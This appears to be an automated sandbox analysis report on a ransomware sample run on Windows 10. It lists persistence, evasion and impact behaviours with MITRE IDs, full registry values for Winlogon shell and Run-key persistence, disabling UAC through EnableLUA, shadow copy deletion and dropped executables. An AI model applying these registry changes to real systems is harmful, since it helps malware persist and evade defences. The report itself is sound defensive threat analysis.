hxxps://github[.]com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/7ev3n[.]exe

Resubmissions

07-05-2024 16:28

240507-tyx6ssha59 10

07-05-2024 16:24

240507-twmx2sed5t 10

Analysis

max time kernel
457s
max time network
484s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
07-05-2024 16:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo/blob/master/Ransomware/7ev3n.exe

Score

10^/10

defense_evasion evasion execution impact persistence ransomware spyware stealer trojan upx

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

msiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe"	msiexec.exe

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (51) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

satan.exesatan.exeefku.exeefku.exesatan.exesatan.exexyigo.exexyigo.exesatan.exesatan.exeviwa.exeviwa.exesatan.exesatan.exeandu.exeandu.exeXyeta.exeXyeta.exeXyeta.exeXyeta.exeWinlockerVB6Blacksod.exeViraLock.exeAwEkgEAU.exeSgUAQMAU.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exeViraLock.exe

pid	process
3420	satan.exe
4504	satan.exe
1028	efku.exe
456	efku.exe
2064	satan.exe
4864	satan.exe
1268	xyigo.exe
3420	xyigo.exe
4816	satan.exe
4864	satan.exe
720	viwa.exe
4188	viwa.exe
1228	satan.exe
4296	satan.exe
3080	andu.exe
4476	andu.exe
1108	Xyeta.exe
5100	Xyeta.exe
412	Xyeta.exe
4340	Xyeta.exe
4980	WinlockerVB6Blacksod.exe
2604	ViraLock.exe
4232	AwEkgEAU.exe
764	SgUAQMAU.exe
2388	ViraLock.exe
4612	ViraLock.exe
1792	ViraLock.exe
816	ViraLock.exe
644	ViraLock.exe
1644	ViraLock.exe
1104	ViraLock.exe
5040	ViraLock.exe
888	ViraLock.exe
2488	ViraLock.exe
720	ViraLock.exe
2116	ViraLock.exe
3236	ViraLock.exe
1684	ViraLock.exe
716	ViraLock.exe
1436	ViraLock.exe
268	ViraLock.exe
3748	ViraLock.exe
632	ViraLock.exe
4860	ViraLock.exe
4916	ViraLock.exe
4472	ViraLock.exe
2468	ViraLock.exe
1684	ViraLock.exe
3548	ViraLock.exe
2232	ViraLock.exe
4712	ViraLock.exe
4816	ViraLock.exe
412	ViraLock.exe
4320	ViraLock.exe
3660	ViraLock.exe
4972	ViraLock.exe
1828	ViraLock.exe
2024	ViraLock.exe
4456	ViraLock.exe
1640	ViraLock.exe
3844	ViraLock.exe
2520	ViraLock.exe
4472	ViraLock.exe
1232	ViraLock.exe

Loads dropped DLL 16 IoCs

Processes:

WinlockerVB6Blacksod.exeMsiExec.exeMsiExec.exe

pid	process
4980	WinlockerVB6Blacksod.exe
4980	WinlockerVB6Blacksod.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
4844	MsiExec.exe
1344	MsiExec.exe
4844	MsiExec.exe
4980	WinlockerVB6Blacksod.exe
4844	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 989410.crdownload	upx
behavioral2/memory/1108-999-0x0000000000400000-0x000000000044F000-memory.dmp	upx
behavioral2/memory/1108-1001-0x0000000000400000-0x000000000044F000-memory.dmp	upx
behavioral2/memory/5100-1004-0x0000000000400000-0x000000000044F000-memory.dmp	upx
behavioral2/memory/412-1037-0x0000000000400000-0x000000000044F000-memory.dmp	upx

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Explorer.EXEViraLock.exeSgUAQMAU.exeAwEkgEAU.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{5AFE6E6D-23D3-741B-5056-89006DF8340B} = "C:\\Users\\Admin\\AppData\\Roaming\\Yvwiaw\\efku.exe"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AwEkgEAU.exe = "C:\\Users\\Admin\\BEsgsAUM\\AwEkgEAU.exe"	ViraLock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SgUAQMAU.exe = "C:\\ProgramData\\lYUUwkIo\\SgUAQMAU.exe"	ViraLock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SgUAQMAU.exe = "C:\\ProgramData\\lYUUwkIo\\SgUAQMAU.exe"	SgUAQMAU.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2818691465-3043947619-2475182763-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AwEkgEAU.exe = "C:\\Users\\Admin\\BEsgsAUM\\AwEkgEAU.exe"	AwEkgEAU.exe

Blocklisted process makes network request 1 IoCs

Processes:

MsiExec.exe

flow pid process

148 4844 MsiExec.exe

flow	pid	process
148	4844	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

WinlockerVB6Blacksod.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\K:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\X:	WinlockerVB6Blacksod.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	WinlockerVB6Blacksod.exe
